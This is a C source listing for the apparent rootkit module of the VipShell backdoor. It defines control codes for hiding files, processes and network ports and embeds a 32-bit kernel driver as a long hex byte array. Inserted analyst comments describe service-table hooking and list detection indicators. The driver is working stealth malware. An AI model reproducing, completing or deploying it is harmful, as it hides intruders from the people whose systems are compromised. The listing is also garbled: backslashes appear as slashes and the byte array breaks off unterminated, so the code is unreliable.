VipShell驱动隐藏模块

目前支持 隐藏端口, 进程, 文件

#include <Windows.h>
#include <stdio.h>
#include "./RootKitModule.h"
#include <atlbase.h>

// Project-defined macros; their definitions are not visible in this listing
// (presumably they come from RootKitModule.h or a framework header).
// They look like a registration table that exposes RootKitModule from this DLL
// to a host application -- TODO confirm against the macro definitions.
ADD_PINBOARD(RootKitModule)
BEGIN_DLLCreatePINBOARDINSTANCE
ADD_DLL_PINBOARD_SUSTAIN(RootKitModule)
END_DLLCreatePINBOARDINSTANCE

// Base function number for this module's private device-control codes.
// Every code below is FILE_DEVICE_UNKNOWN / METHOD_BUFFERED / FILE_ANY_ACCESS,
// so with the standard CTL_CODE layout the values run from 0x222188 to 0x2221A8
// in steps of 4. FILE_ANY_ACCESS means the I/O manager does not require read or
// write access on the handle that issues them.
#define DEVICE_FILTER_INDEX 0x860


// File hiding: add a name, remove a name, switch the filter on.
#define ZFJ_ROOTKIT_ADDHIDEFILE CTL_CODE(FILE_DEVICE_UNKNOWN,DEVICE_FILTER_INDEX+2,METHOD_BUFFERED,FILE_ANY_ACCESS)
#define ZFJ_ROOTKIT_DELHIDEFILE CTL_CODE(FILE_DEVICE_UNKNOWN,DEVICE_FILTER_INDEX+3,METHOD_BUFFERED,FILE_ANY_ACCESS)
#define ZFJ_ROOTKIT_STARTHIDEFILE CTL_CODE(FILE_DEVICE_UNKNOWN,DEVICE_FILTER_INDEX+4,METHOD_BUFFERED,FILE_ANY_ACCESS)

// Process hiding: add a process id, remove a process id, switch the filter on.
#define ZFJ_ROOTKIT_ADDHIDEPROCESS CTL_CODE(FILE_DEVICE_UNKNOWN,DEVICE_FILTER_INDEX+5,METHOD_BUFFERED,FILE_ANY_ACCESS)
#define ZFJ_ROOTKIT_DELHIDEPROCESS CTL_CODE(FILE_DEVICE_UNKNOWN,DEVICE_FILTER_INDEX+6,METHOD_BUFFERED,FILE_ANY_ACCESS)
#define ZFJ_ROOTKIT_STARTHIDEPROCESS CTL_CODE(FILE_DEVICE_UNKNOWN,DEVICE_FILTER_INDEX+7,METHOD_BUFFERED,FILE_ANY_ACCESS)

// Port hiding: add a port, remove a port, switch the filter on.
#define ZFJ_ROOTKIT_ADDHIDEPORT CTL_CODE(FILE_DEVICE_UNKNOWN,DEVICE_FILTER_INDEX+8,METHOD_BUFFERED,FILE_ANY_ACCESS)
#define ZFJ_ROOTKIT_DELHIDEPORT CTL_CODE(FILE_DEVICE_UNKNOWN,DEVICE_FILTER_INDEX+9,METHOD_BUFFERED,FILE_ANY_ACCESS)
#define ZFJ_ROOTKIT_STARTHIDEPORT CTL_CODE(FILE_DEVICE_UNKNOWN,DEVICE_FILTER_INDEX+10,METHOD_BUFFERED,FILE_ANY_ACCESS)



// User-mode name of the control device opened by _CreateFile().
// NOTE(review): the slashes here look like page-extraction damage (see below).
#define MY_DEVICE_NAME "////.//ZFJ_ROOTKIT"

// Analyst notes on g_szRootKitModule, the byte array that follows (left as published):
//  - On this page every backslash appears as a forward slash ("/x4d" where an
//    escape sequence is expected, "////.//" above), so the listing does not
//    build as shown.
//  - The bytes begin with "MZ" and carry a PE header with machine type 0x014c
//    (32-bit x86): an embedded PE image that CreateDriver() writes to disk and
//    registers as a kernel-driver service.
//  - Strings readable in the bytes, usable as indicators: the UTF-16 names
//    "\Device\ZFJ_ROOTKIT" and "\DosDevices\ZFJ_ROOTKIT", and the debug path
//    "e:\ddkwork\driver1\objfre_wnet_x86\i386\HelloWorld.pdb".
//  - Import names in the image include KeServiceDescriptorTable,
//    ZwQueryDirectoryFile, ZwQuerySystemInformation and ZwDeviceIoControlFile.
//    That is consistent with system-service-table hooking to filter file,
//    process and port listings (inferred from the import names only; the image
//    was not disassembled for this note).
//  - Defensive context: 64-bit Windows blocks this class of driver through
//    driver-signature enforcement and Kernel Patch Protection. On 32-bit hosts,
//    look for a demand-start kernel-driver service whose image file was written
//    by a user-mode process shortly before the service was created.


char g_szRootKitModule[] =    "/x4d/x5a/x90/x00/x03/x00/x00/x00/x04/x00/x00/x00/xff/xff/x00/x00"
"/xb8/x00/x00/x00/x00/x00/x00/x00/x40/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/xd8/x00/x00/x00"
"/x0e/x1f/xba/x0e/x00/xb4/x09/xcd/x21/xb8/x01/x4c/xcd/x21/x54/x68"
"/x69/x73/x20/x70/x72/x6f/x67/x72/x61/x6d/x20/x63/x61/x6e/x6e/x6f"
"/x74/x20/x62/x65/x20/x72/x75/x6e/x20/x69/x6e/x20/x44/x4f/x53/x20"
"/x6d/x6f/x64/x65/x2e/x0d/x0d/x0a/x24/x00/x00/x00/x00/x00/x00/x00"
"/x1d/x55/x06/xc0/x59/x34/x68/x93/x59/x34/x68/x93/x59/x34/x68/x93"
"/x59/x34/x69/x93/x48/x34/x68/x93/xda/x3c/x35/x93/x5a/x34/x68/x93"
"/xd7/x3c/x37/x93/x5b/x34/x68/x93/xd7/x3c/x08/x93/x5d/x34/x68/x93"
"/xda/x3c/x32/x93/x58/x34/x68/x93/x52/x69/x63/x68/x59/x34/x68/x93"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x50/x45/x00/x00/x4c/x01/x05/x00"
"/x08/x1c/x0c/x45/x00/x00/x00/x00/x00/x00/x00/x00/xe0/x00/x0e/x01"
"/x0b/x01/x07/x0a/x00/x0e/x00/x00/x00/x10/x00/x00/x00/x00/x00/x00"
"/x00/x40/x00/x00/x00/x10/x00/x00/x00/x20/x00/x00/x00/x00/x01/x00"
"/x00/x10/x00/x00/x00/x02/x00/x00/x05/x00/x02/x00/x05/x00/x02/x00"
"/x05/x00/x02/x00/x00/x00/x00/x00/x00/x60/x00/x00/x00/x04/x00/x00"
"/xcb/xbe/x00/x00/x01/x00/x00/x04/x00/x00/x04/x00/x00/x10/x00/x00"
"/x00/x00/x10/x00/x00/x10/x00/x00/x00/x00/x00/x00/x10/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x30/x40/x00/x00/x28/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x50/x00/x00/xc4/x00/x00/x00"
"/x50/x20/x00/x00/x1c/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x20/x00/x00/x44/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x2e/x74/x65/x78/x74/x00/x00/x00/x82/x09/x00/x00/x00/x10/x00/x00"
"/x00/x0a/x00/x00/x00/x04/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x20/x00/x00/x68/x2e/x72/x64/x61/x74/x61/x00/x00"
"/xbb/x00/x00/x00/x00/x20/x00/x00/x00/x02/x00/x00/x00/x0e/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x40/x00/x00/x48"
"/x2e/x64/x61/x74/x61/x00/x00/x00/x64/x0a/x00/x00/x00/x30/x00/x00"
"/x00/x02/x00/x00/x00/x10/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x40/x00/x00/xc8/x49/x4e/x49/x54/x00/x00/x00/x00"
"/x10/x02/x00/x00/x00/x40/x00/x00/x00/x04/x00/x00/x00/x12/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x20/x00/x00/xe2"
"/x2e/x72/x65/x6c/x6f/x63/x00/x00/xfa/x00/x00/x00/x00/x50/x00/x00"
"/x00/x02/x00/x00/x00/x16/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x40/x00/x00/x42/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x56/x8b/x74/x24/x0c/x8b/x46/x60/x8b/x40/x0c/x8b/x56/x0c/x57/xb9"
"/x98/x21/x22/x00/x33/xff/x3b/xc1/x77/x46/x74/x3b/x2d/x80/x21/x22"
"/x00/x74/x78/x83/xe8/x08/x74/x27/x83/xe8/x04/x74/x1a/x83/xe8/x04"
"/x74/x0e/x83/xe8/x04/x75/x3f/xff/x32/xe8/x54/x06/x00/x00/xeb/x5b"
"/xe8/x89/x03/x00/x00/xeb/x54/x52/xe8/x31/x04/x00/x00/xeb/x4c/x52"
"/xe8/x8f/x04/x00/x00/xeb/x44/xff/x32/xe8/x0c/x06/x00/x00/xeb/x3b"
"/x2d/x9c/x21/x22/x00/x74/x2f/x83/xe8/x04/x74/x21/x83/xe8/x04/x74"
"/x13/x83/xe8/x04/x74/x07/xbf/x10/x00/x00/xc0/xeb/x1e/xe8/x64/x08"
"/x00/x00/xeb/x17/xff/x32/xe8/x0b/x08/x00/x00/xeb/x0e/xff/x32/xe8"
"/x2a/x08/x00/x00/xeb/x05/xe8/x23/x05/x00/x00/x32/xd2/x8b/xce/x89"
"/x7e/x18/xff/x15/x00/x20/x01/x00/x8b/xc7/x5f/x5e/xc2/x08/x00/xcc"
"/x8b/x4c/x24/x08/x83/x61/x18/x00/x32/xd2/xff/x15/x00/x20/x01/x00"
"/x33/xc0/xc2/x08/x00/xcc/x5c/x00/x44/x00/x6f/x00/x73/x00/x44/x00"
"/x65/x00/x76/x00/x69/x00/x63/x00/x65/x00/x73/x00/x5c/x00/x5a/x00"
"/x46/x00/x4a/x00/x5f/x00/x52/x00/x4f/x00/x4f/x00/x54/x00/x4b/x00"
"/x49/x00/x54/x00/x00/x00/x55/x8b/xec/x51/x51/x66/x83/x65/xf8/x00"
"/x57/x33/xc0/x8d/x7d/xfa/xab/x66/xab/xe8/x14/x03/x00/x00/xe8/xff"
"/x04/x00/x00/xe8/x22/x08/x00/x00/x68/xc6/x10/x01/x00/x8d/x45/xf8"
"/x50/xff/x15/x0c/x20/x01/x00/x83/x7d/xfc/x00/x5f/x74/x0a/x8d/x45"
"/xf8/x50/xff/x15/x08/x20/x01/x00/x8b/x45/x08/x85/xc0/x74/x17/x56"
"/x8b/x70/x04/xeb/x0c/x8b/xc6/x8b/x76/x0c/x50/xff/x15/x04/x20/x01"
"/x00/x85/xf6/x75/xf0/x5e/xc9/xc2/x04/x00/x5c/x00/x44/x00/x65/x00"
"/x76/x00/x69/x00/x63/x00/x65/x00/x5c/x00/x5a/x00/x46/x00/x4a/x00"
"/x5f/x00/x52/x00/x4f/x00/x4f/x00/x54/x00/x4b/x00/x49/x00/x54/x00"
"/x00/x00/x5c/x00/x44/x00/x6f/x00/x73/x00/x44/x00/x65/x00/x76/x00"
"/x69/x00/x63/x00/x65/x00/x73/x00/x5c/x00/x5a/x00/x46/x00/x4a/x00"
"/x5f/x00/x52/x00/x4f/x00/x4f/x00/x54/x00/x4b/x00/x49/x00/x54/x00"
"/x00/x00/x55/x8b/xec/x83/xec/x14/x53/x56/x57/x33/xc0/x33/xdb/x66"
"/x89/x5d/xf4/x8d/x7d/xf6/xab/x66/xab/x33/xc0/x66/x89/x5d/xec/x8d"
"/x7d/xee/xab/x66/xab/x8b/x3d/x0c/x20/x01/x00/x68/x5a/x11/x01/x00"
"/x8d/x45/xf4/x50/x89/x5d/xfc/xff/xd7/x8b/x75/x08/x8d/x45/xfc/x50"
"/x53/x53/x6a/x22/x8d/x45/xf4/x50/x53/x56/xff/x15/x14/x20/x01/x00"
"/x3b/xc3/x7c/x5f/xe8/x61/x02/x00/x00/xe8/x4c/x04/x00/x00/xe8/x73"
"/x06/x00/x00/x68/x82/x11/x01/x00/x8d/x45/xec/x50/xff/xd7/x8d/x45"
"/xf4/x50/x8d/x45/xec/x50/xff/x15/x10/x20/x01/x00/x8b/xf8/x3b/xfb"
"/x7d/x10/x39/x5d/xfc/x74/x2a/xff/x75/xfc/xff/x15/x04/x20/x01/x00"
"/xeb/x1f/xb8/xb0/x10/x01/x00/x89/x46/x38/x89/x46/x40/x89/x46/x44"
"/x89/x46/x48/xc7/x46/x70/x00/x10/x01/x00/xc7/x46/x34/xf6/x10/x01"
"/x00/x8b/xc7/x5f/x5e/x5b/xc9/xc2/x08/x00/x00/xcc/x55/x8b/xec/x83"
"/xec/x18/x53/x8b/x5d/x1c/x56/xff/x75/x30/xff/x75/x2c/xff/x75/x28"
"/xff/x75/x24/xff/x75/x20/x53/xff/x75/x18/xff/x75/x14/xff/x75/x10"
"/xff/x75/x0c/xff/x75/x08/xff/x15/x08/x3a/x01/x00/x89/x45/x30/x68"
"/x6a/x12/x01/x00/x8d/x45/xf8/x50/xff/x15/x28/x20/x01/x00/x33/xf6"
"/x39/x75/x30/x0f/x8c/x0c/x01/x00/x00/x83/x7d/x24/x03/x0f/x85/x02"
"/x01/x00/x00/x57/x0f/xb7/x4d/xf8/x8b/x7d/xfc/x8b/xd1/x33/xc0/xc1"
"/xe9/x02/xf3/xab/x8b/xca/x83/xe1/x03/xf3/xaa/x33/xc0/x39/x03/x0f"
"/x94/xc0/x89/x45/x24/x8d/x43/x5e/x50/x8d/x45/xf0/x50/xff/x15/x0c"
"/x20/x01/x00/x8b/x3d/x24/x20/x01/x00/x6a/x01/x8d/x45/xf0/x50/x8d"
"/x45/xf8/x50/xff/xd7/x6a/x01/x8d/x45/xf0/x50/x8d/x45/xe8/x50/xff"
"/xd7/x8d/x45/xe8/x50/x8d/x45/xf8/x50/xff/x15/x20/x20/x01/x00/x8b"
"/x43/x3c/x8b/x4d/xfc/xd1/xe8/xc6/x04/x08/x00/xbf/x08/x30/x01/x00"
"/x8b/xc7/x8d/x50/x01/x8a/x08/x40/x84/xc9/x75/xf9/x2b/xc2/x89/x45"
"/x2c/x74/x61/x8b/x43/x3c/xd1/xe8/x50/x57/xff/x75/xfc/xff/x15/x1c"
"/x20/x01/x00/x8b/x4b/x3c/xd1/xe9/x3b/xc1/x74/x10/x81/xc7/x00/x01"
"/x00/x00/x81/xff/x08/x3a/x01/x00/x7c/xc6/xeb/x38/x83/x7d/x24/x00"
"/x74/x13/x3b/x5d/x1c/x75/x09/xc7/x45/x30/x06/x00/x00/x80/xeb/x24"
"/x83/x26/x00/xeb/x1f/x8b/x03/x8b/x4d/x1c/x2b/xc8/x2b/xcb/x03/x4d"
"/x20/x8d/x34/x18/x8b/xc1/xc1/xe9/x02/x8b/xfb/xf3/xa5/x8b/xc8/x83"
"/xe1/x03/xf3/xa4/x8b/xf3/x03/x1b/x83/x7d/x24/x00/x0f/x84/x12/xff"
"/xff/xff/x8b/x35/x18/x20/x01/x00/x8d/x45/xe8/x50/xff/xd6/x8d/x45"
"/xf8/x50/xff/xd6/x5f/x8b/x45/x30/x5e/x5b/xc9/xc2/x2c/x00/x83/x3d"
"/x08/x3a/x01/x00/x00/x74/x03/x33/xc0/xc3/x8b/x0d/x30/x20/x01/x00"
"/x8b/x15/x2c/x20/x01/x00/x8b/x41/x01/x8b/x12/x8b/x04/x82/xa3/x08"
"/x3a/x01/x00/xfa/x0f/x20/xc0/x25/xff/xff/xfe/xff/x0f/x22/xc0/x8b"
"/x41/x01/x8b/x0d/x2c/x20/x01/x00/x8b/x09/xc7/x04/x81/x6c/x12/x01"
"/x00/x0f/x20/xc0/x0d/x00/x00/x01/x00/x0f/x22/xc0/xfb/x33/xc0/x40"
"/xc3/xcc/x83/x3d/x08/x3a/x01/x00/x00/x75/x03/x33/xc0/xc3/xfa/x0f"
"/x20/xc0/x25/xff/xff/xfe/xff/x0f/x22/xc0/x8b/x0d/x2c/x20/x01/x00"
"/xa1/x30/x20/x01/x00/x8b/x40/x01/x8b/x09/x8b/x15/x08/x3a/x01/x00"
"/x89/x14/x81/x0f/x20/xc0/x0d/x00/x00/x01/x00/x0f/x22/xc0/xfb/x83"
"/x25/x08/x3a/x01/x00/x00/x33/xc0/x40/xc3/x57/xb9/x80/x02/x00/x00"
"/x33/xc0/xbf/x08/x30/x01/x00/xf3/xab/x5f/xc3/xcc/x00/xcc/x53/x56"
"/x57/x33/xd2/xbf/x08/x30/x01/x00/x8b/x74/x24/x10/x8b/xc7/x8a/x18"
"/x8a/xcb/x3a/x1e/x75/x1a/x84/xc9/x74/x12/x8a/x58/x01/x8a/xcb/x3a"
"/x5e/x01/x75/x0c/x40/x40/x46/x46/x84/xc9/x75/xe2/x33/xc0/xeb/x05"
"/x1b/xc0/x83/xd8/xff/x85/xc0/x74/x17/x81/xc7/x00/x01/x00/x00/x42"
"/x81/xff/x08/x3a/x01/x00/x7c/xc0/x33/xc0/x5f/x5e/x5b/xc2/x04/x00"
"/xa0/x7c/x14/x01/x00/xc1/xe2/x08/x88/x82/x08/x30/x01/x00/x33/xc0"
"/x40/xeb/xe7/xcc/x55/x8b/xec/x51/x56/x57/x33/xc9/xbf/x08/x30/x01"
"/x00/x8b/xc7/x8d/x70/x01/x8a/x10/x40/x84/xd2/x75/xf9/x2b/xc6/x89"
"/x45/xfc/x74/x17/x81/xc7/x00/x01/x00/x00/x41/x81/xff/x08/x3a/x01"
"/x00/x7c/xde/x33/xc0/x5f/x5e/xc9/xc2/x04/x00/x8b/x45/x08/xc1/xe1"
"/x08/x8d/x91/x08/x30/x01/x00/x2b/xd0/x8a/x08/x88/x0c/x02/x40/x84"
"/xc9/x75/xf6/x33/xc0/x40/xeb/xdd/x55/x8b/xec/x56/xff/x75/x14/x8b"
"/x75/x0c/xff/x75/x10/x56/xff/x75/x08/xff/x15/x34/x3a/x01/x00/x85"
"/xc0/x7c/x65/x83/x7d/x08/x05/x75/x5f/x8b/x16/x57/x33/xff/x85/xd2"
"/x8b/xce/x74/x4f/x8d/x0c/x32/xeb/x4a/xbe/x0c/x3a/x01/x00/x8b/x16"
"/x85/xd2/x74/x2d/x39/x51/x44/x75/x19/x85/xff/x74/x0d/x8b/x11/x85"
"/xd2/x74/x04/x01/x17/xeb/x03/x83/x27/x00/x8b/x11/x85/xd2/x74/x0f"
"/x03/xca/x83/xc6/x04/x81/xfe/x34/x3a/x01/x00/x7c/xd1/xeb/x02/x33"
"/xc9/x85/xc9/x74/x12/x8b/x11/x85/xd2/x8b/xf9/x74/x04/x03/xca/xeb"
"/x02/x33/xc9/x85/xc9/x75/xb2/x5f/x5e/x5d/xc2/x10/x00/xcc/x83/x3d"
"/x34/x3a/x01/x00/x00/x74/x03/x33/xc0/xc3/x8b/x0d/x34/x20/x01/x00"
"/x8b/x15/x2c/x20/x01/x00/x8b/x41/x01/x8b/x12/x8b/x04/x82/xa3/x34"
"/x3a/x01/x00/xfa/x0f/x20/xc0/x25/xff/xff/xfe/xff/x0f/x22/xc0/x8b"
"/x41/x01/x8b/x0d/x2c/x20/x01/x00/x8b/x09/xc7/x04/x81/x38/x15/x01"
"/x00/x0f/x20/xc0/x0d/x00/x00/x01/x00/x0f/x22/xc0/xfb/x33/xc0/x40"
"/xc3/xcc/x83/x3d/x34/x3a/x01/x00/x00/x75/x03/x33/xc0/xc3/xfa/x0f"
"/x20/xc0/x25/xff/xff/xfe/xff/x0f/x22/xc0/x8b/x0d/x2c/x20/x01/x00"
"/xa1/x34/x20/x01/x00/x8b/x40/x01/x8b/x09/x8b/x15/x34/x3a/x01/x00"
"/x89/x14/x81/x0f/x20/xc0/x0d/x00/x00/x01/x00/x0f/x22/xc0/xfb/x83"
"/x25/x34/x3a/x01/x00/x00/x33/xc0/x40/xc3/x57/x6a/x0a/x59/x33/xc0"
"/xbf/x0c/x3a/x01/x00/xf3/xab/x5f/xc3/xcc/x33/xc0/x8b/x0c/x85/x0c"
"/x3a/x01/x00/x3b/x4c/x24/x04/x74/x0b/x40/x83/xf8/x0a/x7c/xed/x33"
"/xc0/xc2/x04/x00/x83/x24/x85/x0c/x3a/x01/x00/x00/x33/xc0/x40/xeb"
"/xf0/xcc/x33/xc0/x83/x3c/x85/x0c/x3a/x01/x00/x00/x74/x0b/x40/x83"
"/xf8/x0a/x7c/xf0/x33/xc0/xc2/x04/x00/x8b/x4c/x24/x04/x89/x0c/x85"
"/x0c/x3a/x01/x00/x33/xc0/x40/xeb/xed/xcc/x55/x8b/xec/x83/xec/x24"
"/x53/x8b/x5d/x28/x56/xff/x75/x2c/x8b/x75/x20/x53/xff/x75/x24/x56"
"/xff/x75/x1c/xff/x75/x18/xff/x75/x14/xff/x75/x10/xff/x75/x0c/xff"
"/x75/x08/xff/x15/x60/x3a/x01/x00/x81/x7d/x1c/x03/x00/x12/x00/x89"
"/x45/x28/x0f/x85/x88/x01/x00/x00/x85/xc0/x57/x0f/x8c/x7e/x01/x00"
"/x00/x83/x65/xe0/x00/x6a/x05/x59/x8d/x7d/xdc/x33/xd2/xc7/x45/xdc"
"/x00/x04/x00/x00/xc7/x45/xe4/x00/x02/x00/x00/xc7/x45/xe8/x00/x01"
"/x00/x00/xc7/x45/xec/x01/x01/x00/x00/xf3/xa7/x0f/x85/x98/x00/x00"
"/x00/x8b/x45/x18/x8b/x40/x04/x6a/x14/x59/xf7/xf1/x83/x65/x1c/x00"
"/x85/xc0/x7e/x7a/x8d/x48/xff/x89/x4d/x20/x8d/x4b/x14/x89/x4d/x2c"
"/xbe/x38/x3a/x01/x00/x8b/x3e/x85/xff/x74/x54/x33/xc9/x8a/x6b/x08"
"/x8a/x4b/x09/x3b/xcf/x74/x0d/x83/xc6/x04/x81/xfe/x60/x3a/x01/x00"
"/x7c/xe3/xeb/x3b/x8b/x4d/x20/x39/x4d/x1c/x74/x2f/x8b/x75/x2c/x8b"
"/xc8/x2b/x4d/x1c/x8b/xfb/x49/x8d/x0c/x89/xc1/xe1/x02/x8b/xd1/xc1"
"/xe9/x02/xf3/xa5/x8b/xca/x83/xe1/x03/x48/xff/x4d/x20/xff/x4d/x1c"
"/x83/xeb/x14/x83/x6d/x2c/x14/xf3/xa4/xeb/x04/x48/xff/x4d/x20/xff"
"/x45/x1c/x83/x45/x2c/x14/x83/xc3/x14/x39/x45/x1c/x7c/x92/x8d/x04"
"/x80/xc1/xe0/x02/xe9/xad/x00/x00/x00/x8b/x75/x20/x6a/x05/x59/x8d"
"/x7d/xdc/x33/xd2/xc7/x45/xec/x02/x01/x00/x00/xf3/xa7/x0f/x85/x9c"
"/x00/x00/x00/x8b/x45/x18/x8b/x40/x04/x6a/x18/x59/xf7/xf1/x83/x65"
"/x1c/x00/x85/xc0/x7e/x7a/x8d/x48/xff/x89/x4d/x20/x8d/x4b/x18/x89"
"/x4d/x2c/xbe/x38/x3a/x01/x00/x8b/x3e/x85/xff/x74/x54/x33/xc9/x8a"
"/x6b/x08/x8a/x4b/x09/x3b/xcf/x74/x0d/x83/xc6/x04/x81/xfe/x60/x3a"
"/x01/x00/x7c/xe3/xeb/x3b/x8b/x4d/x20/x39/x4d/x1c/x74/x2f/x8b/x75"
"/x2c/x8b/xc8/x2b/x4d/x1c/x8b/xfb/x49/x8d/x0c/x49/xc1/xe1/x03/x8b"
"/xd1/xc1/xe9/x02/xf3/xa5/x8b/xca/x83/xe1/x03/x48/xff/x4d/x20/xff"
"/x4d/x1c/x83/xeb/x18/x83/x6d/x2c/x18/xf3/xa4/xeb/x04/x48/xff/x4d"
"/x20/xff/x45/x1c/x83/x45/x2c/x18/x83/xc3/x18/x39/x45/x1c/x7c/x92"
"/x8d/x04/x40/xc1/xe0/x03/x8b/x4d/x18/x89/x41/x04/x8b/x45/x28/x5f"
"/x5e/x5b/xc9/xc2/x28/x00/x57/x6a/x0a/x59/x33/xc0/xbf/x38/x3a/x01"
"/x00/xf3/xab/x5f/xc3/xcc/x33/xc0/x8b/x0c/x85/x38/x3a/x01/x00/x3b"
"/x4c/x24/x04/x74/x0b/x40/x83/xf8/x0a/x7c/xed/x33/xc0/xc2/x04/x00"
"/x83/x24/x85/x38/x3a/x01/x00/x00/x33/xc0/x40/xeb/xf0/xcc/x33/xc0"
"/x83/x3c/x85/x38/x3a/x01/x00/x00/x74/x0b/x40/x83/xf8/x0a/x7c/xf0"
"/x33/xc0/xc2/x04/x00/x8b/x4c/x24/x04/x89/x0c/x85/x38/x3a/x01/x00"
"/x33/xc0/x40/xeb/xed/xcc/x83/x3d/x60/x3a/x01/x00/x00/x74/x03/x33"
"/xc0/xc3/x8b/x0d/x38/x20/x01/x00/x8b/x15/x2c/x20/x01/x00/x8b/x41"
"/x01/x8b/x12/x8b/x04/x82/xa3/x60/x3a/x01/x00/xfa/x0f/x20/xc0/x25"
"/xff/xff/xfe/xff/x0f/x22/xc0/x8b/x41/x01/x8b/x0d/x2c/x20/x01/x00"
"/x8b/x09/xc7/x04/x81/xba/x16/x01/x00/x0f/x20/xc0/x0d/x00/x00/x01"
"/x00/x0f/x22/xc0/xfb/x33/xc0/x40/xc3/xcc/x83/x3d/x60/x3a/x01/x00"
"/x00/x75/x03/x33/xc0/xc3/xfa/x0f/x20/xc0/x25/xff/xff/xfe/xff/x0f"
"/x22/xc0/x8b/x0d/x2c/x20/x01/x00/xa1/x38/x20/x01/x00/x8b/x40/x01"
"/x8b/x09/x8b/x15/x60/x3a/x01/x00/x89/x14/x81/x0f/x20/xc0/x0d/x00"
"/x00/x01/x00/x0f/x22/xc0/xfb/x83/x25/x60/x3a/x01/x00/x00/x33/xc0"
"/x40/xc3/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x9c/x40/x00/x00/xb2/x40/x00/x00/xc4/x40/x00/x00/xdc/x40/x00/x00"
"/xf4/x40/x00/x00/x0c/x41/x00/x00/x1e/x41/x00/x00/x32/x41/x00/x00"
"/x46/x41/x00/x00/x58/x41/x00/x00/x78/x41/x00/x00/x8c/x41/x00/x00"
"/xa8/x41/x00/x00/xc0/x41/x00/x00/xdc/x41/x00/x00/xf4/x41/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x08/x1c/x0c/x45/x00/x00/x00/x00/x02/x00/x00/x00"
"/x4f/x00/x00/x00/x6c/x20/x00/x00/x6c/x0e/x00/x00/x52/x53/x44/x53"
"/x18/xdc/xdd/xe4/x21/x5b/x6e/x46/xa0/xa1/xff/x50/x1b/x09/xb7/x9c"
"/x01/x00/x00/x00/x65/x3a/x5c/x64/x64/x6b/x77/x6f/x72/x6b/x5c/x64"
"/x72/x69/x76/x65/x72/x31/x5c/x6f/x62/x6a/x66/x72/x65/x5f/x77/x6e"
